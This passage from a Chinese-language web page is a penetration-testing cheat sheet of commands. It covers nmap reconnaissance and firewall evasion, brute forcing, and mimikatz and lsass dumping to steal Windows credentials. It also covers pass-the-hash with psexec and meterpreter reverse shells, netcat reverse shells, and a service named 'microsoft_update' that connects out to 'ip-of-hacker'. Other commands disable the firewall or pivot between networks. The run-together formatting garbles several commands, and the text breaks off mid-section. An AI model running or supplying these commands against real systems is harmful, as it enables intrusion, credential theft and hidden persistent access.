\u5185\u7f6e\u4e86\u5f88\u591a\u63d2\u4ef6\uff0c\u53ef\u4f9b\u6211\u4eec\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\u3002nmap \u4e0d\u4ec5\u4ec5\u662f\u7aef\u53e3\u626b\u63cf\u5668\u3002<\/p>\n\n\n<pre class=\"wp-block-code\"><code>\u4f8b\u5b50\uff1anmap --script all 172.27.42.110 \/\/\u4f7f\u7528\u6240\u6709\u811a\u672c\u5bf9 172.27.42.110 \u4e3b\u673a\u8fdb\u884c\u626b\u63cf\n\u4f8b\u5b50\uff1anmap --script whois www.0day.co \/\/ whois \u901a\u5e38\u8bfb\u4f5c who is , \u7528\u6765\u67e5\u8be2\u4e92\u8054\u7f51\u4e2d \u57df\u540d\u7684IP \u548c \u6240\u6709\u8005\u7684\u4fe1\u606f\n\u4f8b\u5b50\uff1anmap --script whois --script-args whois.whodb=nofollow www.0day.co \/\/\u5f88\u591a\u7f51\u7ad9\u542f\u7528\u4e86who is \u4fdd\u62a4\uff0c\u53ef\u4ee5\u67e5\u8be2who is \u7684\u5386\u53f2\u8bb0\u5f55\uff0c\u65e9\u671f\u7684\u53ef\u80fd\u6ca1\u6709\u4fdd\u62a4\u3002\n\u4f8b\u5b50\uff1anmap -sn --script whois -v -iL host.txt \/\/\u5982\u679c\u76ee\u6807\u57df\u540d\u6bd4\u8f83\u591a\uff0c\u53ef\u4ee5\u4f7f\u7528\u5217\u8868\u5f62\u5f0f\n\u4f8b\u5b50\uff1anmap --script http-email-harvest www.0day.co \/\/\u641c\u96c6email \u4fe1\u606f\n\u4f8b\u5b50\uff1anmap -sn --script hostmap-ip2hosts www.0day.co \/\/ ip\u53cd\u67e5\uff0c\u5c06\u6240\u6709\u7ed1\u5b9a\u8be5 IP \u7684\u57df\u540d\u663e\u793a\u51fa\u6765\uff0c\u53ef\u4ee5\u6e05\u695a\u7684\u77e5\u9053\u6709\u51e0\u4e2a\u7ad9\u70b9\u5728\u8fd9\u53f0\u670d\u52a1\u5668\u4e0a\u3002\n\u4f8b\u5b50\uff1anmap --script dns-brute www.xxxxx.com \/\/dns \u4fe1\u606f\u641c\u96c6 \uff0c\u9ed8\u8ba4 5\u7ebf\u7a0b\n\u4f8b\u5b50\uff1anmap --script dns-brute dns-brute.threads=10 www.xxxxx.com \/\/dns \u4fe1\u606f\u641c\u96c6\uff0c\u6307\u5b9a\u7ebf\u7a0b\u6570\u662f10\n\u4f8b\u5b50\uff1anmap --script dns-brute --script-args dns-brute.domain=www.baidu.com \/\/ \u5bf9 baidu.com \u5b50\u57df\u540d\u7684\u5217\u4e3e<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\"><strong>web \u6f0f\u6d1e&nbsp;<\/strong><\/p>\n\n\n<pre class=\"wp-block-code\"><code>nmap -p80 --script http-stored-xss.nse www.xxx.com \/\/ nmap\u4e0b\u63d0\u4f9b\u4e86\u5f88\u591aweb\u6f0f\u6d1e\u7684\u68c0\u6d4b\u811a\u672c\uff0c http-stored-xss.nse \u53ef\u4ee5\u53d1\u73b0\u7f51\u7ad9\u7684XSS\uff08\u8de8\u7ad9\u811a\u672c\u653b\u51fb\uff09\nnmap -sV --script http-sql-injection www.xxx.com \/\/ http-sql-injection \u53ef\u4ee5\u53d1\u73b0SQL \u6ce8\u5165\u6f0f\u6d1e\u3002\u5728TOP \u6f0f\u6d1e\u6392\u884c\u91cc\uff0cXSS \u4e0e SQL \u4e00\u76f4\u5c45\u9ad8\u4e0d\u4e0b\u3002<\/code><\/pre>\n\n\n<h1 class=\"wp-block-heading\">\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177\u5b9e\u6218\u6280\u5de7\u5408\u96c6<\/h1>\n\n\n<figure class=\"wp-block-embed-wordpress wp-block-embed is-type-wp-embed is-provider-\u94c1\u5320\u8fd0\u7ef4\u7f51\"><div class=\"wp-block-embed__wrapper\">\nhttp:\/\/www.tiejiang.org\/6764.html\n<\/div><\/figure>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u6700\u597d\u7684 NMAP \u626b\u63cf\u7b56\u7565<\/strong><\/p>\n\n\n<pre class=\"wp-block-code\"><code># \u9002\u7528\u6240\u6709\u5927\u5c0f\u7f51\u7edc\u6700\u597d\u7684 nmap \u626b\u63cf\u7b56\u7565# \u4e3b\u673a\u53d1\u73b0\uff0c\u751f\u6210\u5b58\u6d3b\u4e3b\u673a\u5217\u8868\n$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0\/24\n$ grep \"Status: Up\" Discovery.gnmap | cut -f 2 -d' ' > LiveHosts.txt\n\n# \u7aef\u53e3\u53d1\u73b0\uff0c\u53d1\u73b0\u5927\u90e8\u5206\u5e38\u7528\u7aef\u53e3# http:\/\/nmap.org\/presentations\/BHDC08\/bhdc08-slides-fyodor.pdf\n$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt\n$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt\n$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt\n\n# \u7aef\u53e3\u53d1\u73b0\uff0c\u53d1\u73b0\u5168\u90e8\u7aef\u53e3\uff0c\u4f46 UDP \u7aef\u53e3\u7684\u626b\u63cf\u4f1a\u975e\u5e38\u6162\n$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt\n$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt\n\n# \u663e\u793a TCPUDP \u7aef\u53e3\n$ grep \"open\" FullTCP|cut -f 1 -d' ' | sort -nu | cut -f 1 -d'\/' |xargs | sed 's\/ \/,\/g'|awk '{print \"T:\"$0}'\n$ grep \"open\" FullUDP|cut -f 1 -d' ' | sort -nu | cut -f 1 -d'\/' |xargs | sed 's\/ \/,\/g'|awk '{print \"U:\"$0}'# \u4fa6\u6d4b\u670d\u52a1\u7248\u672c\n$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt\n\n# \u626b\u505a\u7cfb\u7edf\u626b\u63cf\n$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt\n\n# \u7cfb\u7edf\u548c\u670d\u52a1\u68c0\u6d4b\n$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\"><strong>Nmap \u2013 \u8eb2\u907f\u9632\u706b\u5899<\/strong><\/p>\n\n\n<pre class=\"wp-block-code\"><code># \u5206\u6bb5\n$ nmap -f\n\n# \u4fee\u6539\u9ed8\u8ba4 MTU \u5927\u5c0f\uff0c\u4f46\u5fc5\u987b\u4e3a 8 \u7684\u500d\u6570(8,16,24,32 \u7b49\u7b49)\n$ nmap --mtu 24# \u751f\u6210\u968f\u673a\u6570\u91cf\u7684\u6b3a\u9a97\n$ nmap -D RND:10 &#91;target]\n\n# \u624b\u52a8\u6307\u5b9a\u6b3a\u9a97\u4f7f\u7528\u7684 IP\n$ nmap -D decoy1,decoy2,decoy3 etc.\n\n# \u50f5\u5c38\u7f51\u7edc\u626b\u63cf, \u9996\u5148\u9700\u8981\u627e\u5230\u50f5\u5c38\u7f51\u7edc\u7684IP\n$ nmap -sI &#91;Zombie IP] &#91;Target IP]\n\n# \u6307\u5b9a\u6e90\u7aef\u53e3\u53f7\n$ nmap --source-port 80 IP\n\n# \u5728\u6bcf\u4e2a\u626b\u63cf\u6570\u636e\u5305\u540e\u8ffd\u52a0\u968f\u673a\u6570\u91cf\u7684\u6570\u636e\n$ nmap --data-length 25 IP\n\n# MAC \u5730\u5740\u6b3a\u9a97\uff0c\u53ef\u4ee5\u751f\u6210\u4e0d\u540c\u4e3b\u673a\u7684 MAC \u5730\u5740\n$ nmap --spoof-mac Dell\/Apple\/3Com IP<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\"><strong>Nmap \u8fdb\u884c Web \u6f0f\u6d1e\u626b\u63cf<\/strong><\/p>\n\n\n<pre class=\"wp-block-code\"><code>cd \/usr\/share\/nmap\/scripts\/\nwget http:\/\/www.computec.ch\/projekte\/vulscan\/download\/nmap_nse_vulscan-2.0.tar.gz &amp;&amp; tar xzf nmap_nse_vulscan-2.0.tar.gz\nnmap -sS -sV --script=vulscan\/vulscan.nse target\nnmap -sS -sV --script=vulscan\/vulscan.nse \u2013script-args vulscandb=scipvuldb.csv target\nnmap -sS -sV --script=vulscan\/vulscan.nse \u2013script-args vulscandb=scipvuldb.csv -p80 target\nnmap -PN -sS -sV --script=vulscan \u2013script-args vulscancorrelation=1 -p80 target\nnmap -sV --script=vuln target\nnmap -PN -sS -sV --script=all \u2013script-args vulscancorrelation=1 target<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u4f7f\u7528 DIRB \u7206\u7834\u76ee\u5f55<\/strong><\/p>\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\uff1aDIRB \u662f\u4e00\u4e2a\u4e13\u95e8\u7528\u4e8e\u7206\u7834\u76ee\u5f55\u7684\u5de5\u5177\uff0c\u5728 Kali \u4e2d\u9ed8\u8ba4\u5df2\u7ecf\u5b89\u88c5\uff0c\u7c7b\u4f3c\u5de5\u5177\u8fd8\u6709\u56fd\u5916\u7684patator\uff0cdirsearch\uff0cDirBuster\uff0c \u56fd\u5185\u7684\u5fa1\u5251\u7b49\u7b49\u3002<\/p>\n\n\n<pre class=\"wp-block-code\"><code>dirb http:\/\/IP:PORT \/usr\/share\/dirb\/wordlists\/common.txt<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\"><strong>Patator \u2013 \u5168\u80fd\u66b4\u529b\u7834\u89e3\u6d4b\u8bd5\u5de5\u5177<\/strong><\/p>\n\n\n<pre class=\"wp-block-code\"><code># git clone https:\/\/github.com\/lanjelot\/patator.git \/usr\/share\/patator# SMTP \u7206\u7834\n$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE00=\/usr\/share\/john\/password.lst\n$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE00=\/usr\/share\/john\/password.lst 1=\/usr\/share\/john\/usernames.lst\n$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE00=\/usr\/share\/john\/password.lst 1=\/usr\/share\/john\/usernames.lst\n$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE00=\/usr\/share\/john\/password.lst -x ignore:fgrep='incorrect password or account name'<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u4f7f\u7528 Fierce \u7206\u7834 DNS<\/strong><\/p>\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\uff1aFierce \u4f1a\u68c0\u67e5 DNS \u670d\u52a1\u5668\u662f\u5426\u5141\u8bb8\u533a\u57df\u4f20\u9001\u3002\u5982\u679c\u5141\u8bb8\uff0c\u5c31\u4f1a\u8fdb\u884c\u533a\u57df\u4f20\u9001\u5e76\u901a\u77e5\u7528\u6237\uff0c\u5982\u679c\u4e0d\u5141\u8bb8\uff0c\u5219\u53ef\u4ee5\u901a\u8fc7\u67e5\u8be2 DNS \u670d\u52a1\u5668\u679a\u4e3e\u4e3b\u673a\u540d\u3002\u7c7b\u4f3c\u5de5\u5177\uff1asubDomainsBrute \u548c SubBrute \u7b49\u7b49<\/p>\n\n\n<pre class=\"wp-block-code\"><code># http:\/\/ha.ckers.org\/fierce\/\n$ .\/fierce.pl -dns example.com\n$ .\/fierce.pl \u2013dns example.com \u2013wordlist myWordList.txt<\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u4f7f\u7528 Nikto \u626b\u63cf Web \u670d\u52a1<\/strong><\/p>\n\n\n<pre class=\"wp-block-code\"><code>nikto -C all -h http:\/\/IP<\/code><\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u626b\u63cf WordPress<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">git clone https:\/\/github.com\/wpscanteam\/wpscan.git &amp;amp;&amp;amp; cd wpscan.\/wpscan&nbsp;\u2013url http:\/\/IP\/ \u2013enumerate p<\/pre>\n\n\n<h3 class=\"wp-block-heading\">HTTP \u6307\u7eb9\u8bc6\u522b<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">wget http:\/\/www.net-square.com\/_assets\/httprint_linux_301.zip &amp;amp;&amp;amp; unzip httprint_linux_301.zipcd httprint_301\/linux\/.\/httprint&nbsp;-h http:\/\/IP -s signatures.txt<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528 Skipfish \u626b\u63cf<\/h3>\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\uff1aSkipfish \u662f\u4e00\u6b3e Web \u5e94\u7528\u5b89\u5168\u4fa6\u67e5\u5de5\u5177\uff0cSkipfish \u4f1a\u5229\u7528\u9012\u5f52\u722c\u866b\u548c\u57fa\u4e8e\u5b57\u5178\u7684\u63a2\u9488\u751f\u6210\u4e00\u5e45\u4ea4\u4e92\u5f0f\u7f51\u7ad9\u5730\u56fe\uff0c\u6700\u7ec8\u751f\u6210\u7684\u5730\u56fe\u4f1a\u5728\u901a\u8fc7\u5b89\u5168\u68c0\u67e5\u540e\u8f93\u51fa\u3002<\/p>\n\n\n<pre class=\"wp-block-preformatted\">skipfish&nbsp;-m&nbsp;5&nbsp;-LY&nbsp;-S&nbsp;\/usr\/share\/skipfish\/dictionaries\/complete.wl&nbsp;-o&nbsp;.\/skipfish2&nbsp;-u http:\/\/IP<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528 NC \u626b\u63cf<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">nc&nbsp;-v&nbsp;-w&nbsp;1&nbsp;target&nbsp;-z&nbsp;1-1000for&nbsp;i&nbsp;in&nbsp;{101..102};&nbsp;do&nbsp;nc&nbsp;-vv&nbsp;-n&nbsp;-w&nbsp;1&nbsp;192.168.56.$i&nbsp;21-25&nbsp;-z;&nbsp;done<\/pre>\n\n\n<h3 class=\"wp-block-heading\">Unicornscan<\/h3>\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\uff1a<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.tiejiang.org\/goto\/y8tb\" rel=\"noreferrer noopener\" rel=\"nofollow\" >Unicornscan<\/a>&nbsp;\u662f\u4e00\u4e2a\u4fe1\u606f\u6536\u96c6\u548c\u5b89\u5168\u5ba1\u8ba1\u7684\u5de5\u5177\u3002<\/p>\n\n\n<pre class=\"wp-block-preformatted\">us-H-msf-Iv&nbsp;192.168.56.101-p&nbsp;1-65535us-H-mU-Iv&nbsp;192.168.56.101-p&nbsp;1-65535-H&nbsp;\u5728\u751f\u6210\u62a5\u544a\u9636\u6bb5\u89e3\u6790\u4e3b\u673a\u540d-m&nbsp;\u626b\u63cf\u7c7b\u578b&nbsp;(sf-tcp,&nbsp;U-udp)-Iv-&nbsp;\u8be6\u7ec6<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528 Xprobe2 \u8bc6\u522b\u64cd\u4f5c\u7cfb\u7edf\u6307\u7eb9<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">xprobe2-v-ptcp:80:openIP<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u679a\u4e3e Samba<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">nmblookup&nbsp;-A targetsmbclient&nbsp;\/\/MOUNT\/share -I target -Nrpcclient&nbsp;-U&nbsp;\"\"&nbsp;targetenum4linux target<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u679a\u4e3e SNMP<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">snmpget&nbsp;-v&nbsp;1&nbsp;-c&nbsp;public&nbsp;IPsnmpwalk&nbsp;-v&nbsp;1&nbsp;-c&nbsp;public&nbsp;IPsnmpbulkwalk&nbsp;-v2c&nbsp;-c&nbsp;public&nbsp;-Cn0&nbsp;-Cr10&nbsp;IP<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u5b9e\u7528\u7684 Windows Cmd \u547d\u4ee4<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">net localgroup&nbsp;Usersnet localgroup&nbsp;Administratorssearch dir\/s&nbsp;*.docsystem(\"start cmd.exe \/k $cmd\")sc create microsoft_update binpath=\"cmd \/K start c:nc.exe -d ip-of-hacker port -e cmd.exe\"&nbsp;start=&nbsp;auto&nbsp;error=&nbsp;ignore\/c C:nc.exe&nbsp;-e c:windowssystem32cmd.exe&nbsp;-vv&nbsp;23.92.17.1037779mimikatz.exe&nbsp;\"privilege::debug\"\"log\"\"sekurlsa::logonpasswords\"Procdump.exe&nbsp;-accepteula&nbsp;-ma lsass.exe lsass.dmpmimikatz.exe&nbsp;\"sekurlsa::minidump lsass.dmp\"\"log\"\"sekurlsa::logonpasswords\"C:tempprocdump.exe&nbsp;-accepteula&nbsp;-ma lsass.exe lsass.dmp&nbsp;32&nbsp;\u4f4d\u7cfb\u7edfC:tempprocdump.exe&nbsp;-accepteula&nbsp;-64&nbsp;-ma lsass.exe lsass.dmp&nbsp;64&nbsp;\u4f4d\u7cfb\u7edf<\/pre>\n\n\n<h3 class=\"wp-block-heading\">PuTTY \u8fde\u63a5\u96a7\u9053<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">\u8f6c\u53d1\u8fdc\u7a0b\u7aef\u53e3\u5230\u76ee\u6807\u5730\u5740plink.exe-P&nbsp;22&nbsp;-lroot-pw&nbsp;\"1234\"&nbsp;-R&nbsp;445:127.0.0.1:445IP<\/pre>\n\n\n<h3 class=\"wp-block-heading\">Meterpreter \u7aef\u53e3\u8f6c\u53d1<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># https:\/\/www.offensive-security.com\/metasploit-unleashed\/portfwd\/# \u8f6c\u53d1\u8fdc\u7a0b\u7aef\u53e3\u5230\u76ee\u6807\u5730\u5740meterpreter &amp;gt; portfwd add \u2013l 3389 \u2013p 3389 \u2013r 172.16.194.141kali&nbsp;&amp;gt;&nbsp;rdesktop&nbsp;127.0.0.1:3389<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u5f00\u542f RDP \u670d\u52a1<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">reg add&nbsp;\"hklmsystemcurrentcontrolsetcontrolterminal server\"&nbsp;\/f&nbsp;\/v fDenyTSConnections&nbsp;\/t REG_DWORD&nbsp;\/d&nbsp;0netsh firewall&nbsp;set&nbsp;service remoteadmin enablenetsh firewall&nbsp;set&nbsp;service remotedesktop enable<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u5173\u95ed Windows \u9632\u706b\u5899<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">netsh firewall&nbsp;set&nbsp;opmode disable<\/pre>\n\n\n<h3 class=\"wp-block-heading\">Meterpreter VNCRDP<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># https:\/\/www.offensive-security.com\/metasploit-unleashed\/enabling-remote-desktop\/run getgui&nbsp;-u admin&nbsp;-p&nbsp;1234run vnc&nbsp;-p&nbsp;5043<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528 Mimikatz<\/h3>\n\n\n<p class=\"wp-block-paragraph\">\u83b7\u53d6 Windows \u660e\u6587\u7528\u6237\u540d\u5bc6\u7801<\/p>\n\n\n<pre class=\"wp-block-preformatted\">git clone https:\/\/github.com\/gentilkiwi\/mimikatz.gitprivilege::debugsekurlsa::logonPasswords full<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u83b7\u53d6\u54c8\u5e0c\u503c<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">git clone https:\/\/github.com\/byt3bl33d3r\/pth-toolkitpth-winexe&nbsp;-U hash&nbsp;\/\/IP cmd&nbsp;\u6216\u8005&nbsp;apt-get&nbsp;install freerdp-x11xfreerdp&nbsp;\/u:offsec&nbsp;\/d:win2012&nbsp;\/pth:HASH&nbsp;\/v:IP&nbsp;\u5728\u6216\u8005&nbsp;meterpreter&nbsp;&amp;gt;&nbsp;run post\/windows\/gather\/hashdumpAdministrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::msf&nbsp;&amp;gt;&nbsp;use&nbsp;exploit\/windows\/smb\/psexecmsf exploit(psexec)&nbsp;&amp;gt;&nbsp;set&nbsp;payload windows\/meterpreter\/reverse_tcpmsf exploit(psexec)&nbsp;&amp;gt;&nbsp;set&nbsp;SMBPass&nbsp;e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586cmsf exploit(psexec)&nbsp;&amp;gt;&nbsp;exploitmeterpreter&nbsp;&amp;gt;&nbsp;shell<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528 Hashcat \u7834\u89e3\u5bc6\u7801<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">hashcat&nbsp;-m&nbsp;400&nbsp;-a&nbsp;0&nbsp;hash&nbsp;\/root\/rockyou.txt<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528 NC \u6293\u53d6 Banner \u4fe1\u606f<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">nc&nbsp;192.168.0.1080GET&nbsp;\/&nbsp;HTTP\/1.1Host:192.168.0.10User-Agent:&nbsp;Mozilla\/4.0Referrer:&nbsp;www.example.com&amp;lt;enter&amp;gt;&amp;lt;enter&amp;gt;<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528 NC \u5728 Windows \u4e0a\u53cd\u5f39 Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">c:&amp;gt;nc&nbsp;-Lp&nbsp;31337&nbsp;-vv&nbsp;-e cmd.exenc&nbsp;192.168.0.10&nbsp;31337c:&amp;gt;nc example.com&nbsp;80&nbsp;-e cmd.exenc&nbsp;-lp&nbsp;80&nbsp;nc&nbsp;-lp&nbsp;31337&nbsp;-e&nbsp;\/bin\/bashnc&nbsp;192.168.0.10&nbsp;31337nc&nbsp;-vv&nbsp;-r(random)&nbsp;-w(wait)&nbsp;1&nbsp;192.168.0.10&nbsp;-z(i\/o error)&nbsp;1-1000<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u67e5\u627e SUIDSGID Root \u6587\u4ef6<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># \u67e5\u627e SUID root \u6587\u4ef6find&nbsp;\/&nbsp;-user root&nbsp;-perm&nbsp;-4000&nbsp;-print# \u67e5\u627e SGID root \u6587\u4ef6:find&nbsp;\/&nbsp;-group&nbsp;root&nbsp;-perm&nbsp;-2000&nbsp;-print# \u67e5\u627e SUID \u548c SGID \u6587\u4ef6:find&nbsp;\/&nbsp;-perm&nbsp;-4000&nbsp;-o&nbsp;-perm&nbsp;-2000&nbsp;-print# \u67e5\u627e\u4e0d\u5c5e\u4e8e\u4efb\u4f55\u7528\u6237\u7684\u6587\u4ef6:find&nbsp;\/&nbsp;-nouser&nbsp;-print# \u67e5\u627e\u4e0d\u5c5e\u4e8e\u4efb\u4f55\u7528\u6237\u7ec4\u7684\u6587\u4ef6:find&nbsp;\/&nbsp;-nogroup&nbsp;-print# \u67e5\u627e\u8f6f\u8fde\u63a5\u53ca\u5176\u6307\u5411:find&nbsp;\/&nbsp;-type l&nbsp;-ls<\/pre>\n\n\n<h3 class=\"wp-block-heading\">Python Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">python&nbsp;-c&nbsp;'import pty;pty.spawn(\"\/bin\/bash\")'<\/pre>\n\n\n<h3 class=\"wp-block-heading\">PythonRubyPHP HTTP \u670d\u52a1\u5668<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">python2&nbsp;-m&nbsp;SimpleHTTPServerpython3&nbsp;-m http.serverruby&nbsp;-rwebrick&nbsp;-e&nbsp;\"WEBrick::HTTPServer.new(:Port =&amp;gt; 8888,ocumentRoot =&amp;gt; Dir.pwd).start\"php&nbsp;-S&nbsp;0.0.0.0:8888<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u83b7\u53d6\u8fdb\u7a0b\u5bf9\u5e94\u7684 PID<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">fuser&nbsp;-nv tcp&nbsp;80fuser&nbsp;-k&nbsp;-n tcp&nbsp;80<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528 Hydra \u7206\u7834 RDP<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">hydra&nbsp;-l admin&nbsp;-P&nbsp;\/root\/Desktop\/passwords&nbsp;-S X.X.X.X rdp<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u6302\u8f7d\u8fdc\u7a0b Windows \u5171\u4eab\u6587\u4ef6\u5939<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">smbmount&nbsp;\/\/X.X.X.X\/c$ \/mnt\/remote\/ -o username=user,password=pass,rw<\/pre>\n\n\n<h3 class=\"wp-block-heading\">Kali \u4e0b\u7f16\u8bd1 Exploit<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">gcc-m32-ooutput32hello.c&nbsp;(32&nbsp;\u4f4d)gcc-m64-ooutputhello.c&nbsp;(64&nbsp;\u4f4d)<\/pre>\n\n\n<h3 class=\"wp-block-heading\">Kali \u4e0b\u7f16\u8bd1 Windows Exploit<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">wget&nbsp;-O mingw-get-setup.exe http:\/\/sourceforge.net\/projects\/mingw\/files\/Installer\/mingw-get-setup.exe\/downloadwine mingw-get-setup.exeselect&nbsp;mingw32-basecd&nbsp;\/root\/.wine\/drive_c\/windowswget http:\/\/gojhonny.com\/misc\/mingw_bin.zip &amp;amp;&amp;amp; unzip mingw_bin.zipcd&nbsp;\/root\/.wine\/drive_c\/MinGW\/binwine gcc&nbsp;-o ability.exe&nbsp;\/tmp\/exploit.c&nbsp;-lwsock32wine ability.exe<\/pre>\n\n\n<h3 class=\"wp-block-heading\">NASM \u547d\u4ee4<\/h3>\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\uff1aNASM \u5168\u79f0 The Netwide Assembler\uff0c\u662f\u4e00\u6b3e\u57fa\u4e8e80\u00d786\u548cx86-64\u5e73\u53f0\u7684\u6c47\u7f16\u8bed\u8a00\u7f16\u8bd1\u7a0b\u5e8f\uff0c\u5176\u8bbe\u8ba1\u521d\u8877\u662f\u4e3a\u4e86\u5b9e\u73b0\u7f16\u8bd1\u5668\u7a0b\u5e8f\u8de8\u5e73\u53f0\u548c\u6a21\u5757\u5316\u7684\u7279\u6027\u3002<\/p>\n\n\n<pre class=\"wp-block-preformatted\">nasm-fbin-opayload.binpayload.asmnasm-felfpayload.asm;&nbsp;ld-opayloadpayload.o;&nbsp;objdump-dpayload<\/pre>\n\n\n<h3 class=\"wp-block-heading\">SSH \u7a7f\u900f<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">ssh-D&nbsp;127.0.0.1:1080-p&nbsp;22&nbsp;user@IPAdd&nbsp;socks4&nbsp;127.0.0.11080&nbsp;in&nbsp;\/etc\/proxychains.confproxychains commands target<\/pre>\n\n\n<h3 class=\"wp-block-heading\">SSH \u7a7f\u900f\u4ece\u4e00\u4e2a\u7f51\u7edc\u5230\u53e6\u4e00\u4e2a\u7f51\u7edc<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">ssh&nbsp;-D&nbsp;127.0.0.1:1080&nbsp;-p&nbsp;22&nbsp;user1@IP1Add&nbsp;socks4&nbsp;127.0.0.11080&nbsp;in&nbsp;\/etc\/proxychains.confproxychains ssh&nbsp;-D&nbsp;127.0.0.1:1081&nbsp;-p&nbsp;22&nbsp;user1@IP2Add&nbsp;socks4&nbsp;127.0.0.11081&nbsp;in&nbsp;\/etc\/proxychains.confproxychains commands target<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528 Metasploit \u8fdb\u884c\u7a7f\u900f<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">route add X.X.X.X&nbsp;255.255.255.01use&nbsp;auxiliary\/server\/socks4arunproxychains msfcli windows\/* PAYLOAD=windows\/meterpreter\/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E&nbsp;\u6216\u8005&nbsp;# https:\/\/www.offensive-security.com\/metasploit-unleashed\/pivoting\/meterpreter &amp;gt; ipconfigIP Address : 10.1.13.3meterpreter &amp;gt; run autoroute -s 10.1.13.0\/24meterpreter &amp;gt; run autoroute -p10.1.13.0255.255.255.0 Session 1meterpreter &amp;gt; Ctrl+Zmsf auxiliary(tcp) &amp;gt; use exploit\/windows\/smb\/psexecmsf exploit(psexec) &amp;gt; set RHOST 10.1.13.2msf exploit(psexec) &amp;gt; exploitmeterpreter &amp;gt; ipconfigIP Address : 10.1.13.2<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u57fa\u4e8e CSV \u6587\u4ef6\u67e5\u8be2 Exploit-DB<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">git clone https:\/\/github.com\/offensive-security\/exploit-database.gitcd exploit-database.\/searchsploit&nbsp;\u2013u.\/searchsploit apache&nbsp;2.2.\/searchsploit&nbsp;\"Linux Kernel\"&nbsp;cat files.csv&nbsp;|&nbsp;grep&nbsp;-i linux&nbsp;|&nbsp;grep&nbsp;-i kernel&nbsp;|&nbsp;grep&nbsp;-i&nbsp;local&nbsp;|&nbsp;grep&nbsp;-v dos&nbsp;|&nbsp;uniq&nbsp;|&nbsp;grep&nbsp;2.6&nbsp;|&nbsp;egrep&nbsp;\"&amp;lt;|&amp;lt;=\"&nbsp;|&nbsp;sort&nbsp;-k3<\/pre>\n\n\n<h3 class=\"wp-block-heading\">MSF Payloads<\/h3>\n\n\n<pre 